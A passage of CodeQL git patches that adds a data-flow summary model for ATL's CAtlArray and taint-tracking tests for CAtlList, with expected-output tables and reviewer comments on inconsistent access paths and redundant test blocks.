+| atl.cpp:239:26:239:27 | a3 | atl.cpp:239:25:239:27 | & ... 
| | +| atl.cpp:240:10:240:11 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | +| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:244:5:244:6 | a5 | | +| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:245:10:245:11 | a5 | | +| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:250:3:250:3 | a5 | | +| atl.cpp:244:5:244:6 | ref arg a5 | atl.cpp:245:10:245:11 | a5 | | +| atl.cpp:244:5:244:6 | ref arg a5 | atl.cpp:250:3:250:3 | a5 | | +| atl.cpp:245:10:245:11 | ref arg a5 | atl.cpp:250:3:250:3 | a5 | | +| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:248:5:248:6 | a6 | | +| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:249:10:249:11 | a6 | | +| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:250:3:250:3 | a6 | | +| atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:249:10:249:11 | a6 | | +| atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | +| atl.cpp:249:10:249:11 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 0f8df1cd9f3843704d43be4efadd71440c98c4f4 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 11:34:42 +0000 Subject: [PATCH 0725/1267] C++: Add MaD model for 'CAtlArray'. --- cpp/ql/lib/ext/CAtlArray.model.yml | 15 +++++++++++++++ .../library-tests/dataflow/taint-tests/atl.cpp | 18 +++++++++--------- 2 files changed, 24 insertions(+), 9 deletions(-) create mode 100644 cpp/ql/lib/ext/CAtlArray.model.yml diff --git a/cpp/ql/lib/ext/CAtlArray.model.yml b/cpp/ql/lib/ext/CAtlArray.model.yml new file mode 100644 index 00000000000..29afc0c9959 --- /dev/null +++ b/cpp/ql/lib/ext/CAtlArray.model.yml 
@@ -0,0 +1,15 @@
+extensions:
+ - addsTo:
+ pack: codeql/cpp-all
+ extensible: summaryModel
+ data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance
+ - ["", "CAtlArray", True, "Add", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlArray", True, "Append", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlArray", True, "Copy", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlArray", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"]
+ - ["", "CAtlArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"]
+ - ["", "CAtlArray", True, "InsertArrayAt", "", "", "Argument[*1].Element[@]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlArray", True, "InsertAt", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlArray", True, "SetAt", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlArray", True, "SetAtGrow", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"]
+ - ["", "CAtlArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*]", "value", "manual"]
diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp
index c26966c908e..4b3f1438d8d 100644
--- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp
+++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp
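Review bot: The rows that store an element in CAtlArray.model.yml do not use the same access paths: `Add` reads from `Argument[*@0]`, while `InsertAt`, `SetAt` and `SetAtGrow` read from `Argument[@1]`, and `operator[]` returns through `ReturnValue[*]` where `GetAt` and `GetData` use `ReturnValue[*@]`. If the difference is intended, a one-line comment above those rows should state which form applies to which parameter shape; if it is not, the rows should be aligned, because a wrong access path in a summary model silently loses taint instead of failing. The `SetAt` row also has no matching call in the part of test_CAtlArray shown in the following hunk (only `Add`, `Append`, `Copy`, `GetAt`, `GetData`, `InsertArrayAt`, `InsertAt` and `SetAtGrow` appear), so a line such as `a6.SetAt(0, source());` followed by a `sink(a6[0]);` expectation would cover it.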
@@ -217,35 +217,35 @@ void test_CAtlArray() { { CAtlArray a; a.Add(x); - sink(a[0]); // $ MISSING: ir + sink(a[0]); // $ ir a.Add(0); - sink(a[0]); // $ MISSING: ir + sink(a[0]); // $ ir CAtlArray a2; sink(a2[0]); a2.Append(a); - sink(a2[0]); // $ MISSING: ir + sink(a2[0]); // $ ir CAtlArray a3; sink(a3[0]); a3.Copy(a2); - sink(a3[0]); // $ MISSING: ir + sink(a3[0]); // $ ir - sink(a3.GetAt(0)); // $ MISSING: ir - sink(*a3.GetData()); // $ MISSING: ir + sink(a3.GetAt(0)); // $ ir + sink(*a3.GetData()); // $ ir CAtlArray a4; sink(a4.GetAt(0)); a4.InsertArrayAt(0, &a3); - sink(a4.GetAt(0)); // $ MISSING: ir + sink(a4.GetAt(0)); // $ ir } { CAtlArray a5; a5.InsertAt(0, source(), 1); - sink(a5[0]); // $ MISSING: ir + sink(a5[0]); // $ ir CAtlArray a6; a6.SetAtGrow(0, source()); - sink(a6[0]); // $ MISSING: ir + sink(a6[0]); // $ ir } } From c604a93d1611b2ef7be1e5196262ea2ac27559eb Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 11:37:08 +0000 Subject: [PATCH 0726/1267] C++: Add failing tests with 'CAtlList'. --- .../dataflow/taint-tests/atl.cpp | 147 ++++++++++++ .../dataflow/taint-tests/localTaint.expected | 214 ++++++++++++++++++ 2 files changed, 361 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 4b3f1438d8d..b1231c13c48 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
@@ -249,3 +249,150 @@ void test_CAtlArray() { sink(a6[0]); // $ ir } } + +template> +struct CAtlList { + using INARGTYPE = typename ETraits::INARGTYPE; + CAtlList(UINT nBlockSize) throw(); + ~CAtlList() throw(); + POSITION AddHead(); + POSITION AddHead(INARGTYPE element); + void AddHeadList(const CAtlList* plNew); + POSITION AddTail(); + POSITION AddTail(INARGTYPE element); + void AddTailList(const CAtlList* plNew); + POSITION Find(INARGTYPE element, POSITION posStartAfter) const throw(); + POSITION FindIndex(size_t iElement) const throw(); + E& GetAt(POSITION pos) throw(); + const E& GetAt(POSITION pos) const throw(); + size_t GetCount() const throw(); + E& GetHead() throw(); + const E& GetHead() const throw(); + POSITION GetHeadPosition() const throw(); + E& GetNext(POSITION& pos) throw(); + const E& GetNext(POSITION& pos) const throw(); + E& GetPrev(POSITION& pos) throw(); + const E& GetPrev(POSITION& pos) const throw(); + E& GetTail() throw(); + const E& GetTail() const throw(); + POSITION GetTailPosition() const throw(); + POSITION InsertAfter(POSITION pos, INARGTYPE element); + POSITION InsertBefore(POSITION pos, INARGTYPE element); + bool IsEmpty() const throw(); + void MoveToHead(POSITION pos) throw(); + void MoveToTail(POSITION pos) throw(); + void RemoveAll() throw(); + void RemoveAt(POSITION pos) throw(); + E RemoveHead(); + void RemoveHeadNoReturn() throw(); + E RemoveTail(); + void RemoveTailNoReturn() throw(); + void SetAt(POSITION pos, INARGTYPE element); + void SwapElements(POSITION pos1, POSITION pos2) throw(); +}; + +void test_CAtlList() { + int x = source(); + { + CAtlList list(10); + sink(list.GetHead()); + list.AddHead(x); + sink(list.GetHead()); // $ MISSING: ir + + CAtlList list2(10); + list2.AddHeadList(&list); + sink(list2.GetHead()); // $ MISSING: ir + + CAtlList list3(10); + list3.AddTail(x); + sink(list3.GetHead()); // $ MISSING: ir + + CAtlList list4(10); + list4.AddTailList(&list3); + sink(list4.GetHead()); // $ MISSING: ir + + { + 
CAtlList list5(10); + auto pos = list5.Find(x, list5.GetHeadPosition()); + sink(list5.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list6(10); + list6.AddHead(x); + auto pos = list6.FindIndex(0); + sink(list6.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list7(10); + auto pos = list7.GetTailPosition(); + list7.InsertAfter(pos, x); + sink(list7.GetHead()); // $ MISSING: ir + } + + { + CAtlList list8(10); + auto pos = list8.GetTailPosition(); + list8.InsertBefore(pos, x); + sink(list8.GetHead()); // $ MISSING: ir + } + { + CAtlList list9(10); + list9.SetAt(list9.GetHeadPosition(), x); + sink(list9.GetHead()); // $ MISSING: ir + } + } + + int* p = indirect_source(); + { + CAtlList list(10); + sink(list.GetHead()); + list.AddHead(x); + sink(list.GetHead()); // $ MISSING: ir + + CAtlList list2(10); + list2.AddHeadList(&list); + sink(list2.GetHead()); // $ MISSING: ir + + CAtlList list3(10); + list3.AddTail(x); + sink(list3.GetHead()); // $ MISSING: ir + + CAtlList list4(10); + list4.AddTailList(&list3); + sink(list4.GetHead()); // $ MISSING: ir + + { + CAtlList list5(10); + auto pos = list5.Find(x, list5.GetHeadPosition()); + sink(list5.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list6(10); + list6.AddHead(x); + auto pos = list6.FindIndex(0); + sink(list6.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list7(10); + auto pos = list7.GetTailPosition(); + list7.InsertAfter(pos, x); + sink(list7.GetHead()); // $ MISSING: ir + } + + { + CAtlList list8(10); + auto pos = list8.GetTailPosition(); + list8.InsertBefore(pos, x); + sink(list8.GetHead()); // $ MISSING: ir + } + { + CAtlList list9(10); + list9.SetAt(list9.GetHeadPosition(), x); + sink(list9.GetHead()); // $ MISSING: ir + } + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index cd0b25deb45..5c7da7123ad 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
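Review bot: `int* p = indirect_source();` at the start of the second block of test_CAtlList is never used: every call in that block (`list.AddHead(x)`, `list3.AddTail(x)`, `list7.InsertAfter(pos, x)`, `list9.SetAt(list9.GetHeadPosition(), x)`) still passes `x`, so the block repeats the first one and adds no coverage for pointer-valued elements. Either pass `p` there, e.g. `list.AddHead(p);` with the sinks adjusted to the element type, or drop the declaration and the duplicated block. In both blocks `list5` calls `Find(x, list5.GetHeadPosition())` on a list that never receives `x`, so a short comment on `sink(list5.GetAt(pos)); // $ MISSING: ir` saying which flow is expected there would help. The template arguments are not visible in this listing, so the element types are inferred.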
+++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
@@ -292,6 +292,220 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:249:10:249:11 | a6 | | | atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | | atl.cpp:249:10:249:11 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:299:18:299:18 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:307:19:307:19 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:316:29:316:29 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:322:21:322:21 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:330:30:330:30 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:337:31:337:31 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:342:44:342:44 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:351:18:351:18 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:359:19:359:19 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:368:29:368:29 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:374:21:374:21 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:382:30:382:30 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:389:31:389:31 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:394:44:394:44 | x | | +| atl.cpp:297:24:297:25 | 10 | atl.cpp:297:24:297:26 | call to CAtlList | TAINT | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:298:10:298:13 | list | | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:299:5:299:8 | list | | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:300:10:300:13 | list | | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:303:24:303:27 | list | | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:345:3:345:3 | list | | +| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:299:5:299:8 | list | | +| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:300:10:300:13 | list | | +| atl.cpp:298:10:298:13 | ref arg 
list | atl.cpp:303:24:303:27 | list | | +| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:345:3:345:3 | list | | +| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:300:10:300:13 | list | | +| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:303:24:303:27 | list | | +| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:345:3:345:3 | list | | +| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:303:24:303:27 | list | | +| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:345:3:345:3 | list | | +| atl.cpp:302:25:302:26 | 10 | atl.cpp:302:25:302:27 | call to CAtlList | TAINT | +| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:303:5:303:9 | list2 | | +| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:304:10:304:14 | list2 | | +| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:345:3:345:3 | list2 | | +| atl.cpp:303:5:303:9 | ref arg list2 | atl.cpp:304:10:304:14 | list2 | | +| atl.cpp:303:5:303:9 | ref arg list2 | atl.cpp:345:3:345:3 | list2 | | +| atl.cpp:303:24:303:27 | list | atl.cpp:303:23:303:27 | & ... 
| | +| atl.cpp:304:10:304:14 | ref arg list2 | atl.cpp:345:3:345:3 | list2 | | +| atl.cpp:306:25:306:26 | 10 | atl.cpp:306:25:306:27 | call to CAtlList | TAINT | +| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:307:5:307:9 | list3 | | +| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:308:10:308:14 | list3 | | +| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:311:24:311:28 | list3 | | +| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:345:3:345:3 | list3 | | +| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:308:10:308:14 | list3 | | +| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:311:24:311:28 | list3 | | +| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:345:3:345:3 | list3 | | +| atl.cpp:308:10:308:14 | ref arg list3 | atl.cpp:311:24:311:28 | list3 | | +| atl.cpp:308:10:308:14 | ref arg list3 | atl.cpp:345:3:345:3 | list3 | | +| atl.cpp:310:25:310:26 | 10 | atl.cpp:310:25:310:27 | call to CAtlList | TAINT | +| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:311:5:311:9 | list4 | | +| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:312:10:312:14 | list4 | | +| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:345:3:345:3 | list4 | | +| atl.cpp:311:5:311:9 | ref arg list4 | atl.cpp:312:10:312:14 | list4 | | +| atl.cpp:311:5:311:9 | ref arg list4 | atl.cpp:345:3:345:3 | list4 | | +| atl.cpp:311:24:311:28 | list3 | atl.cpp:311:23:311:28 | & ... 
| | +| atl.cpp:312:10:312:14 | ref arg list4 | atl.cpp:345:3:345:3 | list4 | | +| atl.cpp:315:27:315:28 | 10 | atl.cpp:315:27:315:29 | call to CAtlList | TAINT | +| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:316:18:316:22 | list5 | | +| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:316:32:316:36 | list5 | | +| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:317:12:317:16 | list5 | | +| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:318:5:318:5 | list5 | | +| atl.cpp:316:18:316:22 | ref arg list5 | atl.cpp:317:12:317:16 | list5 | | +| atl.cpp:316:18:316:22 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | +| atl.cpp:316:24:316:27 | call to Find | atl.cpp:317:24:317:26 | pos | | +| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:316:18:316:22 | list5 | | +| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:317:12:317:16 | list5 | | +| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | +| atl.cpp:317:12:317:16 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | +| atl.cpp:321:27:321:28 | 10 | atl.cpp:321:27:321:29 | call to CAtlList | TAINT | +| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:322:7:322:11 | list6 | | +| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:323:18:323:22 | list6 | | +| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:324:12:324:16 | list6 | | +| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:325:5:325:5 | list6 | | +| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:323:18:323:22 | list6 | | +| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:324:12:324:16 | list6 | | +| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | +| atl.cpp:323:18:323:22 | ref arg list6 | atl.cpp:324:12:324:16 | list6 | | +| atl.cpp:323:18:323:22 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | +| atl.cpp:323:24:323:32 | call to FindIndex | atl.cpp:324:24:324:26 | pos | | +| atl.cpp:324:12:324:16 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | +| atl.cpp:328:27:328:28 | 10 | atl.cpp:328:27:328:29 | 
call to CAtlList | TAINT | +| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:329:18:329:22 | list7 | | +| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:330:7:330:11 | list7 | | +| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:331:12:331:16 | list7 | | +| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:332:5:332:5 | list7 | | +| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:330:7:330:11 | list7 | | +| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:331:12:331:16 | list7 | | +| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | +| atl.cpp:329:24:329:38 | call to GetTailPosition | atl.cpp:330:25:330:27 | pos | | +| atl.cpp:330:7:330:11 | ref arg list7 | atl.cpp:331:12:331:16 | list7 | | +| atl.cpp:330:7:330:11 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | +| atl.cpp:331:12:331:16 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | +| atl.cpp:335:27:335:28 | 10 | atl.cpp:335:27:335:29 | call to CAtlList | TAINT | +| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:336:18:336:22 | list8 | | +| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:337:7:337:11 | list8 | | +| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:338:12:338:16 | list8 | | +| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:339:5:339:5 | list8 | | +| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:337:7:337:11 | list8 | | +| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:338:12:338:16 | list8 | | +| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | +| atl.cpp:336:24:336:38 | call to GetTailPosition | atl.cpp:337:26:337:28 | pos | | +| atl.cpp:337:7:337:11 | ref arg list8 | atl.cpp:338:12:338:16 | list8 | | +| atl.cpp:337:7:337:11 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | +| atl.cpp:338:12:338:16 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | +| atl.cpp:341:27:341:28 | 10 | atl.cpp:341:27:341:29 | call to CAtlList | TAINT | +| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:342:7:342:11 | list9 | | +| 
atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:342:19:342:23 | list9 | | +| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:343:12:343:16 | list9 | | +| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:344:5:344:5 | list9 | | +| atl.cpp:342:7:342:11 | ref arg list9 | atl.cpp:343:12:343:16 | list9 | | +| atl.cpp:342:7:342:11 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | +| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:342:7:342:11 | list9 | | +| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:343:12:343:16 | list9 | | +| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | +| atl.cpp:343:12:343:16 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | +| atl.cpp:349:24:349:25 | 10 | atl.cpp:349:24:349:26 | call to CAtlList | TAINT | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:350:10:350:13 | list | | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:351:5:351:8 | list | | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:352:10:352:13 | list | | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:355:24:355:27 | list | | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:397:3:397:3 | list | | +| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:351:5:351:8 | list | | +| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:352:10:352:13 | list | | +| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:355:24:355:27 | list | | +| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:397:3:397:3 | list | | +| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:352:10:352:13 | list | | +| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:355:24:355:27 | list | | +| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:397:3:397:3 | list | | +| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:355:24:355:27 | list | | +| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:397:3:397:3 | list | | +| atl.cpp:354:25:354:26 | 10 | atl.cpp:354:25:354:27 | call to CAtlList | TAINT | +| atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:355:5:355:9 | list2 | | +| 
atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:356:10:356:14 | list2 | | +| atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:397:3:397:3 | list2 | | +| atl.cpp:355:5:355:9 | ref arg list2 | atl.cpp:356:10:356:14 | list2 | | +| atl.cpp:355:5:355:9 | ref arg list2 | atl.cpp:397:3:397:3 | list2 | | +| atl.cpp:355:24:355:27 | list | atl.cpp:355:23:355:27 | & ... | | +| atl.cpp:356:10:356:14 | ref arg list2 | atl.cpp:397:3:397:3 | list2 | | +| atl.cpp:358:25:358:26 | 10 | atl.cpp:358:25:358:27 | call to CAtlList | TAINT | +| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:359:5:359:9 | list3 | | +| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:360:10:360:14 | list3 | | +| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:363:24:363:28 | list3 | | +| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:397:3:397:3 | list3 | | +| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:360:10:360:14 | list3 | | +| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:363:24:363:28 | list3 | | +| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:397:3:397:3 | list3 | | +| atl.cpp:360:10:360:14 | ref arg list3 | atl.cpp:363:24:363:28 | list3 | | +| atl.cpp:360:10:360:14 | ref arg list3 | atl.cpp:397:3:397:3 | list3 | | +| atl.cpp:362:25:362:26 | 10 | atl.cpp:362:25:362:27 | call to CAtlList | TAINT | +| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:363:5:363:9 | list4 | | +| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:364:10:364:14 | list4 | | +| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:397:3:397:3 | list4 | | +| atl.cpp:363:5:363:9 | ref arg list4 | atl.cpp:364:10:364:14 | list4 | | +| atl.cpp:363:5:363:9 | ref arg list4 | atl.cpp:397:3:397:3 | list4 | | +| atl.cpp:363:24:363:28 | list3 | atl.cpp:363:23:363:28 | & ... 
| | +| atl.cpp:364:10:364:14 | ref arg list4 | atl.cpp:397:3:397:3 | list4 | | +| atl.cpp:367:27:367:28 | 10 | atl.cpp:367:27:367:29 | call to CAtlList | TAINT | +| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:368:18:368:22 | list5 | | +| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:368:32:368:36 | list5 | | +| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:369:12:369:16 | list5 | | +| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:370:5:370:5 | list5 | | +| atl.cpp:368:18:368:22 | ref arg list5 | atl.cpp:369:12:369:16 | list5 | | +| atl.cpp:368:18:368:22 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | +| atl.cpp:368:24:368:27 | call to Find | atl.cpp:369:24:369:26 | pos | | +| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:368:18:368:22 | list5 | | +| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:369:12:369:16 | list5 | | +| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | +| atl.cpp:369:12:369:16 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | +| atl.cpp:373:27:373:28 | 10 | atl.cpp:373:27:373:29 | call to CAtlList | TAINT | +| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:374:7:374:11 | list6 | | +| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:375:18:375:22 | list6 | | +| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:376:12:376:16 | list6 | | +| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:377:5:377:5 | list6 | | +| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:375:18:375:22 | list6 | | +| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:376:12:376:16 | list6 | | +| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | +| atl.cpp:375:18:375:22 | ref arg list6 | atl.cpp:376:12:376:16 | list6 | | +| atl.cpp:375:18:375:22 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | +| atl.cpp:375:24:375:32 | call to FindIndex | atl.cpp:376:24:376:26 | pos | | +| atl.cpp:376:12:376:16 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | +| atl.cpp:380:27:380:28 | 10 | atl.cpp:380:27:380:29 | 
call to CAtlList | TAINT | +| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:381:18:381:22 | list7 | | +| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:382:7:382:11 | list7 | | +| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:383:12:383:16 | list7 | | +| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:384:5:384:5 | list7 | | +| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:382:7:382:11 | list7 | | +| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:383:12:383:16 | list7 | | +| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | +| atl.cpp:381:24:381:38 | call to GetTailPosition | atl.cpp:382:25:382:27 | pos | | +| atl.cpp:382:7:382:11 | ref arg list7 | atl.cpp:383:12:383:16 | list7 | | +| atl.cpp:382:7:382:11 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | +| atl.cpp:383:12:383:16 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | +| atl.cpp:387:27:387:28 | 10 | atl.cpp:387:27:387:29 | call to CAtlList | TAINT | +| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:388:18:388:22 | list8 | | +| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:389:7:389:11 | list8 | | +| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:390:12:390:16 | list8 | | +| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:391:5:391:5 | list8 | | +| atl.cpp:388:18:388:22 | ref arg list8 | atl.cpp:389:7:389:11 | list8 | | +| atl.cpp:388:18:388:22 | ref arg list8 | 